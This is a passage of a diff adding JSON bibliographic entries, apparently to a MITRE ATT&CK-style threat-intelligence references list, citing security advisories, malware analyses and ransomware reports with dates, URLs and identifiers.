"2017-12-07T00:00:00Z", + "date_published": "2017-11-22T00:00:00Z", + "refs": [ + "https://www.us-cert.gov/ncas/alerts/TA17-318B" + ], + "source": "MITRE", + "title": "Alert (TA17-318B): HIDDEN COBRA – North Korean Trojan: Volgmer" + }, + "related": [], + "uuid": "c48c7ac0-8d55-4b62-9606-a9ce420459b6", + "value": "US-CERT Volgmer Nov 2017" + }, + { + "description": "US-CERT. (2018, March 16). Alert (TA18-074A): Russian Government Cyber Activity Targeting Energy and Other Critical Infrastructure Sectors. Retrieved June 6, 2018.", + "meta": { + "date_accessed": "2018-06-06T00:00:00Z", + "date_published": "2018-03-16T00:00:00Z", + "refs": [ + "https://www.us-cert.gov/ncas/alerts/TA18-074A" + ], + "source": "MITRE", + "title": "Alert (TA18-074A): Russian Government Cyber Activity Targeting Energy and Other Critical Infrastructure Sectors" + }, + "related": [], + "uuid": "94e87a92-bf80-43e2-a3ab-cd7d4895f2fc", + "value": "US-CERT TA18-074A" + }, + { + "description": "US-CERT. (2018, April 20). Alert (TA18-106A) Russian State-Sponsored Cyber Actors Targeting Network Infrastructure Devices. Retrieved October 19, 2020.", + "meta": { + "date_accessed": "2020-10-19T00:00:00Z", + "date_published": "2018-04-20T00:00:00Z", + "refs": [ + "https://www.us-cert.gov/ncas/alerts/TA18-106A" + ], + "source": "MITRE", + "title": "Alert (TA18-106A) Russian State-Sponsored Cyber Actors Targeting Network Infrastructure Devices" + }, + "related": [], + "uuid": "1fe55557-94af-4697-a675-884701f70f2a", + "value": "US-CERT-TA18-106A" + }, + { + "description": "US-CERT. (2018, July 20). Alert (TA18-201A) Emotet Malware. Retrieved March 25, 2019.", + "meta": { + "date_accessed": "2019-03-25T00:00:00Z", + "date_published": "2018-07-20T00:00:00Z", + "refs": [ + "https://www.us-cert.gov/ncas/alerts/TA18-201A" + ], + "source": "MITRE", + "title": "Alert (TA18-201A) Emotet Malware" + }, + "related": [], + "uuid": "0043043a-4741-41c2-a6f2-f88d5caa8b7a", + "value": "US-CERT Emotet Jul 2018" + }, + { + "description": "Noteworthy. (2019, January 6). Al-Khaser. Retrieved April 1, 2022.", + "meta": { + "date_accessed": "2022-04-01T00:00:00Z", + "date_published": "2019-01-06T00:00:00Z", + "refs": [ + "https://github.com/LordNoteworthy/al-khaser/tree/master/al-khaser/AntiDebug" + ], + "source": "MITRE", + "title": "Al-Khaser" + }, + "related": [], + "uuid": "d9773aaf-e3ec-4ce3-b5c8-1ca3c4751622", + "value": "AlKhaser Debug" + }, + { + "description": "Bryan Lee and Rob Downs. (2016, February 12). A Look Into Fysbis: Sofacy’s Linux Backdoor. Retrieved September 10, 2017.", + "meta": { + "date_accessed": "2017-09-10T00:00:00Z", + "date_published": "2016-02-12T00:00:00Z", + "refs": [ + "https://researchcenter.paloaltonetworks.com/2016/02/a-look-into-fysbis-sofacys-linux-backdoor/" + ], + "source": "MITRE", + "title": "A Look Into Fysbis: Sofacy’s Linux Backdoor" + }, + "related": [], + "uuid": "3e527ad6-6b56-473d-8178-e1c3c14f2311", + "value": "Fysbis Palo Alto Analysis" + }, + { + "description": "Karmi, D. (2020, January 4). A Look Into Konni 2019 Campaign. Retrieved April 28, 2020.", + "meta": { + "date_accessed": "2020-04-28T00:00:00Z", + "date_published": "2020-01-04T00:00:00Z", + "refs": [ + "https://medium.com/d-hunter/a-look-into-konni-2019-campaign-b45a0f321e9b" + ], + "source": "MITRE", + "title": "A Look Into Konni 2019 Campaign" + }, + "related": [], + "uuid": "e117a6ac-eaa2-4494-b4ae-2d9ae52c3251", + "value": "Medium KONNI Jan 2020" + }, + { + "description": "Jay Chen. (2022, May 16). A Look Into Public Clouds From the Ransomware Actor's Perspective. Retrieved March 21, 2023.", + "meta": { + "date_accessed": "2023-03-21T00:00:00Z", + "date_published": "2022-05-16T00:00:00Z", + "refs": [ + "https://unit42.paloaltonetworks.com/ransomware-in-public-clouds/" + ], + "source": "MITRE", + "title": "A Look Into Public Clouds From the Ransomware Actor's Perspective" + }, + "related": [], + "uuid": "cc6c2b69-ca51-513e-9666-a03be2ea5fcd", + "value": "Unit 42 Palo Alto Ransomware in Public Clouds 2022" + }, + { + "description": "Canadian Centre for Cyber Security. (2023, July 25). ALPHV/BlackCat Ransomware Targeting of Canadian Industries. Retrieved September 13, 2023.", + "meta": { + "date_accessed": "2023-09-13T00:00:00Z", + "date_published": "2023-07-25T00:00:00Z", + "owner": "TidalCyberIan", + "refs": [ + "https://www.cyber.gc.ca/en/alerts-advisories/alphvblackcat-ransomware-targeting-canadian-industries" + ], + "source": "Tidal Cyber", + "title": "ALPHV/BlackCat Ransomware Targeting of Canadian Industries" + }, + "related": [], + "uuid": "610c8f22-1a96-42d2-934d-8467d136eed2", + "value": "Cyber Centre ALPHV/BlackCat July 25 2023" + }, + { + "description": "Marlin, J. (2013, March 24). Alternate Data Streams in NTFS. Retrieved March 21, 2018.", + "meta": { + "date_accessed": "2018-03-21T00:00:00Z", + "date_published": "2013-03-24T00:00:00Z", + "refs": [ + "https://blogs.technet.microsoft.com/askcore/2013/03/24/alternate-data-streams-in-ntfs/" + ], + "source": "MITRE", + "title": "Alternate Data Streams in NTFS" + }, + "related": [], + "uuid": "eae434ff-97c0-4a82-9f80-215e515befae", + "value": "Microsoft ADS Mar 2014" + }, + { + "description": "Chester, A. (2017, November 20). Alternative methods of becoming SYSTEM. Retrieved June 4, 2019.", + "meta": { + "date_accessed": "2019-06-04T00:00:00Z", + "date_published": "2017-11-20T00:00:00Z", + "refs": [ + "https://blog.xpnsec.com/becoming-system/" + ], + "source": "MITRE", + "title": "Alternative methods of becoming SYSTEM" + }, + "related": [], + "uuid": "0dbf093e-4b54-4972-b048-2a6411037da4", + "value": "XPNSec PPID Nov 2017" + }, + { + "description": "Microsoft. (2018, May 31). AlwaysInstallElevated. Retrieved December 14, 2020.", + "meta": { + "date_accessed": "2020-12-14T00:00:00Z", + "date_published": "2018-05-31T00:00:00Z", + "refs": [ + "https://docs.microsoft.com/en-us/windows/win32/msi/alwaysinstallelevated" + ], + "source": "MITRE", + "title": "AlwaysInstallElevated" + }, + "related": [], + "uuid": "19026f4c-ad65-435e-8c0e-a8ccc9895348", + "value": "Microsoft AlwaysInstallElevated 2018" + }, + { + "description": "Amazon. (n.d.). Amazon EBS snapshots. Retrieved October 13, 2021.", + "meta": { + "date_accessed": "2021-10-13T00:00:00Z", + "refs": [ + "https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/EBSSnapshots.html" + ], + "source": "MITRE", + "title": "Amazon EBS snapshots" + }, + "related": [], + "uuid": "3961a653-b53c-4ba4-9ea6-709e1d1bdb55", + "value": "Amazon Snapshots" + }, + { + "description": "Amazon. (n.d.). Amazon Machine Images (AMI). Retrieved October 13, 2021.", + "meta": { + "date_accessed": "2021-10-13T00:00:00Z", + "refs": [ + "https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/AMIs.html" + ], + "source": "MITRE", + "title": "Amazon Machine Images (AMI)" + }, + "related": [], + "uuid": "bc9ecf45-2a20-47df-a634-064237e5f126", + "value": "Amazon AMI" + }, + { + "description": "Amazon. (n.d.). Amazon S3. Retrieved October 13, 2021.", + "meta": { + "date_accessed": "2021-10-13T00:00:00Z", + "refs": [ + "https://aws.amazon.com/s3/" + ], + "source": "MITRE", + "title": "Amazon S3" + }, + "related": [], + "uuid": "7fecbd5d-626f-496a-a72f-5f166c78c204", + "value": "Amazon S3" + }, + { + "description": "Trend Micro. (2017, November 6). A Misconfigured Amazon S3 Exposed Almost 50 Thousand PII in Australia. Retrieved October 4, 2019.", + "meta": { + "date_accessed": "2019-10-04T00:00:00Z", + "date_published": "2017-11-06T00:00:00Z", + "refs": [ + "https://www.trendmicro.com/vinfo/us/security/news/virtualization-and-cloud/a-misconfigured-amazon-s3-exposed-almost-50-thousand-pii-in-australia" + ], + "source": "MITRE", + "title": "A Misconfigured Amazon S3 Exposed Almost 50 Thousand PII in Australia" + }, + "related": [], + "uuid": "1ba37b48-1219-4f87-af36-9bdd8d6265ca", + "value": "Trend Micro S3 Exposed PII, 2017" + }, + { + "description": "Insikt Group. (2019, June 18). A Multi-Method Approach to Identifying Rogue Cobalt Strike Servers. Retrieved October 16, 2020.", + "meta": { + "date_accessed": "2020-10-16T00:00:00Z", + "date_published": "2019-06-18T00:00:00Z", + "refs": [ + "https://www.recordedfuture.com/cobalt-strike-servers/" + ], + "source": "MITRE", + "title": "A Multi-Method Approach to Identifying Rogue Cobalt Strike Servers" + }, + "related": [], + "uuid": "792ca8a7-c9b2-4e7f-8562-e1ccb60a402a", + "value": "Recorded Future Beacon Certificates" + }, + { + "description": "Dainotti, A. et al. (2012). Analysis of a “/0” Stealth Scan from a Botnet. Retrieved October 20, 2020.", + "meta": { + "date_accessed": "2020-10-20T00:00:00Z", + "date_published": "2012-01-01T00:00:00Z", + "refs": [ + "https://www.caida.org/publications/papers/2012/analysis_slash_zero/analysis_slash_zero.pdf" + ], + "source": "MITRE", + "title": "Analysis of a “/0” Stealth Scan from a Botnet" + }, + "related": [], + "uuid": "ca09941c-fcc8-460b-8b02-d1608a7d3813", + "value": "Botnet Scan" + }, + { + "description": "Borja, A. Camba, A. et al (2020, September 14). Analysis of a Convoluted Attack Chain Involving Ngrok. Retrieved September 15, 2020.", + "meta": { + "date_accessed": "2020-09-15T00:00:00Z", + "refs": [ + "https://www.trendmicro.com/en_us/research/20/i/analysis-of-a-convoluted-attack-chain-involving-ngrok.html" + ], + "source": "MITRE", + "title": "Analysis of a Convoluted Attack Chain Involving Ngrok" + }, + "related": [], + "uuid": "e7b57e64-3532-4b98-9fa5-b832e6fcd53a", + "value": "Trend Micro Ngrok September 2020" + }, + { + "description": "Computer Incident Response Center Luxembourg. (2013, March 29). Analysis of a PlugX variant. Retrieved November 5, 2018.", + "meta": { + "date_accessed": "2018-11-05T00:00:00Z", + "date_published": "2013-03-29T00:00:00Z", + "refs": [ + "http://circl.lu/assets/files/tr-12/tr-12-circl-plugx-analysis-v1.pdf" + ], + "source": "MITRE", + "title": "Analysis of a PlugX variant" + }, + "related": [], + "uuid": "8ab89236-6994-43a3-906c-383e294f65d1", + "value": "CIRCL PlugX March 2013" + }, + { + "description": "Sarah Edwards. (2020, April 30). Analysis of Apple Unified Logs: Quarantine Edition [Entry 6] – Working From Home? Remote Logins. Retrieved August 19, 2021.", + "meta": { + "date_accessed": "2021-08-19T00:00:00Z", + "date_published": "2020-04-30T00:00:00Z", + "refs": [ + "https://sarah-edwards-xzkc.squarespace.com/blog/2020/4/30/analysis-of-apple-unified-logs-quarantine-edition-entry-6-working-from-home-remote-logins" + ], + "source": "MITRE", + "title": "Analysis of Apple Unified Logs: Quarantine Edition [Entry 6] – Working From Home? Remote Logins" + }, + "related": [], + "uuid": "a2169171-8e4a-4faa-811c-98b6204a5a57", + "value": "Apple Unified Log Analysis Remote Login and Screen Sharing" + }, + { + "description": "S2W. (2022, January 18). Analysis of Destructive Malware (WhisperGate) targeting Ukraine. Retrieved March 14, 2022.", + "meta": { + "date_accessed": "2022-03-14T00:00:00Z", + "date_published": "2022-01-18T00:00:00Z", + "refs": [ + "https://medium.com/s2wblog/analysis-of-destructive-malware-whispergate-targeting-ukraine-9d5d158f19f3" + ], + "source": "MITRE", + "title": "Analysis of Destructive Malware (WhisperGate) targeting Ukraine" + }, + "related": [], + "uuid": "06cf7197-244a-431b-a288-4c2bbd431ad5", + "value": "Medium S2W WhisperGate January 2022" + }, + { + "description": "Guillaume Lovet and Alex Kong. (2023, March 9). Analysis of FG-IR-22-369. Retrieved May 15, 2023.", + "meta": { + "date_accessed": "2023-05-15T00:00:00Z", + "date_published": "2023-03-09T00:00:00Z", + "refs": [ + "https://www.fortinet.com/blog/psirt-blogs/fg-ir-22-369-psirt-analysis" + ], + "source": "MITRE", + "title": "Analysis of FG-IR-22-369" + }, + "related": [], + "uuid": "f12b141e-6bb2-5563-9665-5756fec2d5e7", + "value": "Analysis of FG-IR-22-369" + }, + { + "description": "Graeber, M. (2014, October). Analysis of Malicious Security Support Provider DLLs. Retrieved March 1, 2017.", + "meta": { + "date_accessed": "2017-03-01T00:00:00Z", + "date_published": "2014-10-01T00:00:00Z", + "refs": [ + "http://docplayer.net/20839173-Analysis-of-malicious-security-support-provider-dlls.html" + ], + "source": "MITRE", + "title": "Analysis of Malicious Security Support Provider DLLs" + }, + "related": [], + "uuid": "f2f9a6bf-b4d9-461e-b961-0610ea72faf0", + "value": "Graeber 2014" + }, + { + "description": "Zhang, X. (2018, April 05). Analysis of New Agent Tesla Spyware Variant. Retrieved November 5, 2018.", + "meta": { + "date_accessed": "2018-11-05T00:00:00Z", + "date_published": "2018-04-05T00:00:00Z", + "refs": [ + "https://www.fortinet.com/blog/threat-research/analysis-of-new-agent-tesla-spyware-variant.html" + ], + "source": "MITRE", + "title": "Analysis of New Agent Tesla Spyware Variant" + }, + "related": [], + "uuid": "86a65be7-0f70-4755-b526-a26b92eabaa2", + "value": "Fortinet Agent Tesla April 2018" + }, + { + "description": "Antiy CERT. (2020, April 20). Analysis of Ramsay components of Darkhotel's infiltration and isolation network. Retrieved March 24, 2021.", + "meta": { + "date_accessed": "2021-03-24T00:00:00Z", + "date_published": "2020-04-20T00:00:00Z", + "refs": [ + "https://www.programmersought.com/article/62493896999/" + ], + "source": "MITRE", + "title": "Analysis of Ramsay components of Darkhotel's infiltration and isolation network" + }, + "related": [], + "uuid": "280636da-fa21-472c-947c-651a628ea2cd", + "value": "Antiy CERT Ramsay April 2020" + }, + { + "description": "Microsoft Threat Intelligence. (2023, July 14). Analysis of Storm-0558 techniques for unauthorized email access. Retrieved September 18, 2023.", + "meta": { + "date_accessed": "2023-09-18T00:00:00Z", + "date_published": "2023-07-14T00:00:00Z", + "refs": [ + "https://www.microsoft.com/en-us/security/blog/2023/07/14/analysis-of-storm-0558-techniques-for-unauthorized-email-access/" + ], + "source": "MITRE", + "title": "Analysis of Storm-0558 techniques for unauthorized email access" + }, + "related": [], + "uuid": "74fd79a9-09f7-5149-a457-687a1e2989de", + "value": "Storm-0558 techniques for unauthorized email access" + }, + { + "description": "Cherepanov, A.. (2017, July 4). Analysis of TeleBots’ cunning backdoor . Retrieved June 11, 2020.", + "meta": { + "date_accessed": "2020-06-11T00:00:00Z", + "date_published": "2017-07-04T00:00:00Z", + "refs": [ + "https://www.welivesecurity.com/2017/07/04/analysis-of-telebots-cunning-backdoor/" + ], + "source": "MITRE", + "title": "Analysis of TeleBots’ cunning backdoor" + }, + "related": [], + "uuid": "5d62c323-6626-4aad-8bf2-0d988e436f3d", + "value": "ESET Telebots July 2017" + }, + { + "description": "ESTSecurity. (2019, April 17). Analysis of the APT Campaign ‘Smoke Screen’ targeting to Korea and US 출처: https://blog.alyac.co.kr/2243 [이스트시큐리티 알약 블로그]. Retrieved September 29, 2021.", + "meta": { + "date_accessed": "2021-09-29T00:00:00Z", + "date_published": "2019-04-17T00:00:00Z", + "refs": [ + "https://blog.alyac.co.kr/attachment/cfile5.uf@99A0CD415CB67E210DCEB3.pdf" + ], + "source": "MITRE", + "title": "Analysis of the APT Campaign ‘Smoke Screen’ targeting to Korea and US 출처: https://blog.alyac.co.kr/2243 [이스트시큐리티 알약 블로그]" + }, + "related": [], + "uuid": "15213a3c-1e9f-47fa-9864-8ef2707c7fb6", + "value": "EST Kimsuky SmokeScreen April 2019" + }, + { + "description": "Electricity Information Sharing and Analysis Center; SANS Industrial Control Systems. (2016, March 18). Analysis of the Cyber Attack on the Ukranian Power Grid: Defense Use Case. Retrieved March 27, 2018.", + "meta": { + "date_accessed": "2018-03-27T00:00:00Z", + "date_published": "2016-03-18T00:00:00Z", + "refs": [ + "https://nsarchive.gwu.edu/sites/default/files/documents/3891751/SANS-and-Electricity-Information-Sharing-and.pdf" + ], + "source": "MITRE", + "title": "Analysis of the Cyber Attack on the Ukranian Power Grid: Defense Use Case" + }, + "related": [], + "uuid": "8adc6d36-3aa0-5d7b-8bb3-23f4426be8a6", + "value": "Ukraine15 - EISAC - 201603" + }, + { + "description": "Ganani, M. (2015, May 14). Analysis of the Havij SQL Injection tool. Retrieved March 19, 2018.", + "meta": { + "date_accessed": "2018-03-19T00:00:00Z", + "date_published": "2015-05-14T00:00:00Z", + "refs": [ + "https://blog.checkpoint.com/2015/05/14/analysis-havij-sql-injection-tool/" + ], + "source": "MITRE", + "title": "Analysis of the Havij SQL Injection tool" + }, + "related": [], + "uuid": "2e00a539-acbe-4462-a30f-43da4e8b9c4f", + "value": "Check Point Havij Analysis" + }, + { + "description": "Perez, D.. (2018, December 28). Analysis of the latest Emotet propagation campaign. Retrieved April 16, 2019.", + "meta": { + "date_accessed": "2019-04-16T00:00:00Z", + "date_published": "2018-12-28T00:00:00Z", + "refs": [ + "https://www.welivesecurity.com/2018/12/28/analysis-latest-emotet-propagation-campaign/" + ], + "source": "MITRE", + "title": "Analysis of the latest Emotet propagation campaign" + }, + "related": [], + "uuid": "3fab9e25-e83e-4c90-ae32-dcd0c30757f8", + "value": "ESET Emotet Dec 2018" + }, + { + "description": "Rewterz. (2020, June 22). Analysis on Sidewinder APT Group – COVID-19. Retrieved January 29, 2021.", + "meta": { + "date_accessed": "2021-01-29T00:00:00Z", + "date_published": "2020-06-22T00:00:00Z", + "refs": [ + "https://www.rewterz.com/articles/analysis-on-sidewinder-apt-group-covid-19" + ], + "source": "MITRE", + "title": "Analysis on Sidewinder APT Group – COVID-19" + }, + "related": [], + "uuid": "cdd779f1-30c2-40be-a500-332920f0e21c", + "value": "Rewterz Sidewinder COVID-19 June 2020" + }, + { + "description": "CISA. (2018, December 18). Analysis Report (AR18-352A) Quasar Open-Source Remote Administration Tool. Retrieved August 1, 2022.", + "meta": { + "date_accessed": "2022-08-01T00:00:00Z", + "date_published": "2018-12-18T00:00:00Z", + "refs": [ + "https://www.cisa.gov/uscert/ncas/analysis-reports/AR18-352A" + ], + "source": "MITRE", + "title": "Analysis Report (AR18-352A) Quasar Open-Source Remote Administration Tool" + }, + "related": [], + "uuid": "a109e42d-604f-4885-ada3-5d6895addc96", + "value": "CISA AR18-352A Quasar RAT December 2018" + }, + { + "description": "CISA. (2021, May 6). Analysis Report (AR21-126A) FiveHands Ransomware. Retrieved June 7, 2021.", + "meta": { + "date_accessed": "2021-06-07T00:00:00Z", + "date_published": "2021-05-06T00:00:00Z", + "refs": [ + "https://us-cert.cisa.gov/ncas/analysis-reports/ar21-126a" + ], + "source": "MITRE", + "title": "Analysis Report (AR21-126A) FiveHands Ransomware" + }, + "related": [], + "uuid": "f98604dd-2881-4024-8e43-6f5f48c6c9fa", + "value": "CISA AR21-126A FIVEHANDS May 2021" + }, + { + "description": "Joe Security. (n.d.). Analysis Report fasm.dll. Retrieved January 6, 2021.", + "meta": { + "date_accessed": "2021-01-06T00:00:00Z", + "refs": [ + "https://www.joesandbox.com/analysis/318027/0/html" + ], + "source": "MITRE", + "title": "Analysis Report fasm.dll" + }, + "related": [], + "uuid": "d403e610-fa83-4c17-842f-223063864009", + "value": "JoeSecurity Egregor 2020" + }, + { + "description": "Ebach, L. (2017, June 22). Analysis Results of Zeus.Variant.Panda. Retrieved November 5, 2018.", + "meta": { + "date_accessed": "2018-11-05T00:00:00Z", + "date_published": "2017-06-22T00:00:00Z", + "refs": [ + "https://cyberwtf.files.wordpress.com/2017/07/panda-whitepaper.pdf" + ], + "source": "MITRE", + "title": "Analysis Results of Zeus.Variant.Panda" + }, + "related": [], + "uuid": "2d9a6957-5645-4863-968b-4a3c8736564b", + "value": "GDATA Zeus Panda June 2017" + }, + { + "description": "jstnk9.github.io. (2022, June 1). Analyzing AsyncRAT distributed in Colombia | Welcome to Jstnk webpage. Retrieved May 7, 2023.", + "meta": { + "date_accessed": "2023-05-07T00:00:00Z", + "date_published": "2022-06-01T00:00:00Z", + "owner": "TidalCyberIan", + "refs": [ + "https://jstnk9.github.io/jstnk9/research/AsyncRAT-Analysis/" + ], + "source": "Tidal Cyber", + "title": "Analyzing AsyncRAT distributed in Colombia | Welcome to Jstnk webpage" + }, + "related": [], + "uuid": "4e7f573d-f8cc-4538-9f8d-b945f037e46f", + "value": "jstnk9.github.io June 01 2022" + }, + { + "description": "Maynier, E. (2020, December 20). Analyzing Cobalt Strike for Fun and Profit. Retrieved October 12, 2021.", + "meta": { + "date_accessed": "2021-10-12T00:00:00Z", + "date_published": "2020-12-20T00:00:00Z", + "refs": [ + "https://www.randhome.io/blog/2020/12/20/analyzing-cobalt-strike-for-fun-and-profit/" + ], + "source": "MITRE", + "title": "Analyzing Cobalt Strike for Fun and Profit" + }, + "related": [], + "uuid": "f2cb06bc-66d5-4c60-a2a4-74e5a0c23bee", + "value": "Analyzing CS Dec 2020" + }, + { + "description": "Felix. (2016, September). Analyzing Malicious Office Documents. Retrieved April 11, 2018.", + "meta": { + "date_accessed": "2018-04-11T00:00:00Z", + "date_published": "2016-09-01T00:00:00Z", + "refs": [ + "https://www.uperesia.com/analyzing-malicious-office-documents" + ], + "source": "MITRE", + "title": "Analyzing Malicious Office Documents" + }, + "related": [], + "uuid": "f6ffb916-ac14-44d1-8566-26bafa06e77b", + "value": "Uperesia Malicious Office Documents" + }, + { + "description": "Falcone, R., Wilhoit, K.. (2018, November 16). Analyzing OilRig’s Ops Tempo from Testing to Weaponization to Delivery. Retrieved April 23, 2019.", + "meta": { + "date_accessed": "2019-04-23T00:00:00Z", + "date_published": "2018-11-16T00:00:00Z", + "refs": [ + "https://unit42.paloaltonetworks.com/unit42-analyzing-oilrigs-ops-tempo-testing-weaponization-delivery/" + ], + "source": "MITRE", + "title": "Analyzing OilRig’s Ops Tempo from Testing to Weaponization to Delivery" + }, + "related": [], + "uuid": "9bc09d8a-d890-473b-a8cf-ea319fcc3462", + "value": "Unit42 OilRig Nov 2018" + }, + { + "description": "Sherstobitoff, R., Malhotra, A. (2018, April 24). Analyzing Operation GhostSecret: Attack Seeks to Steal Data Worldwide. Retrieved May 16, 2018.", + "meta": { + "date_accessed": "2018-05-16T00:00:00Z", + "date_published": "2018-04-24T00:00:00Z", + "refs": [ + "https://securingtomorrow.mcafee.com/mcafee-labs/analyzing-operation-ghostsecret-attack-seeks-to-steal-data-worldwide/" + ], + "source": "MITRE", + "title": "Analyzing Operation GhostSecret: Attack Seeks to Steal Data Worldwide" + }, + "related": [], + "uuid": "d1cd4f5b-253c-4833-8905-49fb58e7c016", + "value": "McAfee GhostSecret" + }, + { + "description": "MSTIC. (2020, December 18). Analyzing Solorigate, the compromised DLL file that started a sophisticated cyberattack, and how Microsoft Defender helps protect customers . Retrieved January 5, 2021.", + "meta": { + "date_accessed": "2021-01-05T00:00:00Z", + "date_published": "2020-12-18T00:00:00Z", + "refs": [ + "https://www.microsoft.com/security/blog/2020/12/18/analyzing-solorigate-the-compromised-dll-file-that-started-a-sophisticated-cyberattack-and-how-microsoft-defender-helps-protect/" + ], + "source": "MITRE", + "title": "Analyzing Solorigate, the compromised DLL file that started a sophisticated cyberattack, and how Microsoft Defender helps protect customers" + }, + "related": [], + "uuid": "8ad72d46-ba2c-426f-bb0d-eb47723c8e11", + "value": "Microsoft Analyzing Solorigate Dec 2020" + }, + { + "description": "Vasilenko, R. (2013, December 17). An Analysis of PlugX Malware. Retrieved November 24, 2015.", + "meta": { + "date_accessed": "2015-11-24T00:00:00Z", + "date_published": "2013-12-17T00:00:00Z", + "refs": [ + "http://labs.lastline.com/an-analysis-of-plugx" + ], + "source": "MITRE", + "title": "An Analysis of PlugX Malware" + }, + "related": [], + "uuid": "9f7fa262-cede-4f47-94ca-1534c65c86e2", + "value": "Lastline PlugX Analysis" + }, + { + "description": "Wu, W. (2014, October 14). An Analysis of Windows Zero-day Vulnerability ‘CVE-2014-4114’ aka “Sandworm”. Retrieved June 18, 2020.", + "meta": { + "date_accessed": "2020-06-18T00:00:00Z", + "date_published": "2014-10-14T00:00:00Z", + "refs": [ + "https://blog.trendmicro.com/trendlabs-security-intelligence/an-analysis-of-windows-zero-day-vulnerability-cve-2014-4114-aka-sandworm/" + ], + "source": "MITRE", + "title": "An Analysis of Windows Zero-day Vulnerability ‘CVE-2014-4114’ aka “Sandworm”" + }, + "related": [], + "uuid": "84f289ce-c7b9-4f67-b6cc-bd058e5e6bcb", + "value": "TrendMicro Sandworm October 2014" + }, + { + "description": "Joe Slowik. (2018, October 12). Anatomy of an Attack: Detecting and Defeating CRASHOVERRIDE. Retrieved December 18, 2020.", + "meta": { + "date_accessed": "2020-12-18T00:00:00Z", + "date_published": "2018-10-12T00:00:00Z", + "refs": [ + "https://www.dragos.com/wp-content/uploads/CRASHOVERRIDE2018.pdf" + ], + "source": "MITRE", + "title": "Anatomy of an Attack: Detecting and Defeating CRASHOVERRIDE" + }, + "related": [], + "uuid": "d14442d5-2557-4a92-9a29-b15a20752f56", + "value": "Dragos Crashoverride 2018" + }, + { + "description": "Drysdale, D. (2014, July 16). Anatomy of a system call, part 2. Retrieved June 16, 2020.", + "meta": { + "date_accessed": "2020-06-16T00:00:00Z", + "date_published": "2014-07-16T00:00:00Z", + "refs": [ + "https://lwn.net/Articles/604515/" + ], + "source": "MITRE", + "title": "Anatomy of a system call, part 2" + }, + "related": [], + "uuid": "4e8fe849-ab1a-4c51-b5eb-16fcd10e8bd0", + "value": "Syscall 2014" + }, + { + "description": "Shaked, O. (2020, January 20). Anatomy of a Targeted Ransomware Attack. Retrieved June 18, 2022.", + "meta": { + "date_accessed": "2022-06-18T00:00:00Z", + "date_published": "2020-01-20T00:00:00Z", + "refs": [ + "https://cdn.logic-control.com/docs/scadafence/Anatomy-Of-A-Targeted-Ransomware-Attack-WP.pdf" + ], + "source": "MITRE", + "title": "Anatomy of a Targeted Ransomware Attack" + }, + "related": [], + "uuid": "24c80db5-37a7-46ee-b232-f3c3ffb10f0a", + "value": "SCADAfence_ransomware" + }, + { + "description": "Hromcová, Z., Cherepanov, A. (2021). Anatomy of Native IIS Malware. Retrieved September 9, 2021.", + "meta": { + "date_accessed": "2021-09-09T00:00:00Z", + "date_published": "2021-01-01T00:00:00Z", + "refs": [ + "https://i.blackhat.com/USA21/Wednesday-Handouts/us-21-Anatomy-Of-Native-Iis-Malware-wp.pdf" + ], + "source": "MITRE", + "title": "Anatomy of Native IIS Malware" + }, + "related": [], + "uuid": "d9c6e55b-39b7-4097-8ab2-8b87421ce2f4", + "value": "ESET IIS Malware 2021" + }, + { + "description": "Grange, W. (2020, July 13). Anchor_dns malware goes cross platform. Retrieved September 10, 2020.", + "meta": { + "date_accessed": "2020-09-10T00:00:00Z", + "date_published": "2020-07-13T00:00:00Z", + "refs": [ + "https://medium.com/stage-2-security/anchor-dns-malware-family-goes-cross-platform-d807ba13ca30" + ], + "source": "MITRE", + "title": "Anchor_dns malware goes cross platform" + }, + "related": [], + "uuid": "de246d53-385f-44be-bf0f-25a76442b835", + "value": "Medium Anchor DNS July 2020" + }, + { + "description": "NSA, FBI, DHS. (2021, April 15). Russian SVR Targets U.S. and Allied Networks. Retrieved April 16, 2021.", + "meta": { + "date_accessed": "2021-04-16T00:00:00Z", + "refs": [ + "https://media.defense.gov/2021/Apr/15/2002621240/-1/-1/0/CSA_SVR_TARGETS_US_ALLIES_UOO13234021.PDF/CSA_SVR_TARGETS_US_ALLIES_UOO13234021.PDF" + ], + "source": "MITRE", + "title": "and Allied Networks" + }, + "related": [], + "uuid": "43d9c469-1d54-454b-ba67-74e7f1de9c10", + "value": "NSA Joint Advisory SVR SolarWinds April 2021" + }, + { + "description": "Park, S. (2021, June 15). Andariel evolves to target South Korea with ransomware. Retrieved September 29, 2021.", + "meta": { + "date_accessed": "2021-09-29T00:00:00Z", + "date_published": "2021-06-15T00:00:00Z", + "refs": [ + "https://securelist.com/andariel-evolves-to-target-south-korea-with-ransomware/102811/" + ], + "source": "MITRE", + "title": "Andariel evolves to target South Korea with ransomware" + }, + "related": [], + "uuid": "f4efbcb5-494c-40e0-8734-5df1b92ec39c", + "value": "Kaspersky Andariel Ransomware June 2021" + }, + { + "description": "Plummer, D. (1982, November). An Ethernet Address Resolution Protocol. Retrieved October 15, 2020.", + "meta": { + "date_accessed": "2020-10-15T00:00:00Z", + "date_published": "1982-11-01T00:00:00Z", + "refs": [ + "https://tools.ietf.org/html/rfc826" + ], + "source": "MITRE", + "title": "An Ethernet Address Resolution Protocol" + }, + "related": [], + "uuid": "8eef2b68-f932-4cba-8646-bff9a7848532", + "value": "RFC826 ARP" + }, + { + "description": "Schlapfer, Patrick. (2022, June 6). A New Loader Gets Ready. Retrieved December 13, 2022.", + "meta": { + "date_accessed": "2022-12-13T00:00:00Z", + "date_published": "2022-06-06T00:00:00Z", + "refs": [ + "https://threatresearch.ext.hp.com/svcready-a-new-loader-reveals-itself/" + ], + "source": "MITRE", + "title": "A New Loader Gets Ready" + }, + "related": [], + "uuid": "48d5ec83-f1b9-595c-bb9a-d6d5cc513a41", + "value": "HP SVCReady Jun 2022" + }, + { + "description": "Legezo, D. (2022, May 4). A new secret stash for “fileless” malware. Retrieved March 23, 2023.", + "meta": { + "date_accessed": "2023-03-23T00:00:00Z", + "date_published": "2022-05-04T00:00:00Z", + "refs": [ + "https://securelist.com/a-new-secret-stash-for-fileless-malware/106393/" + ], + "source": "MITRE", + "title": "A new secret stash for “fileless” malware" + }, + "related": [], + "uuid": "03eb080d-0b83-5cbb-9317-c50b35996c9b", + "value": "SecureList Fileless" + }, + { + "description": "M.Léveillé, M.. (2014, February 21). An In-depth Analysis of Linux/Ebury. Retrieved April 19, 2019.", + "meta": { + "date_accessed": "2019-04-19T00:00:00Z", + "date_published": "2014-02-21T00:00:00Z", + "refs": [ + "https://www.welivesecurity.com/2014/02/21/an-in-depth-analysis-of-linuxebury/" + ], + "source": "MITRE", + 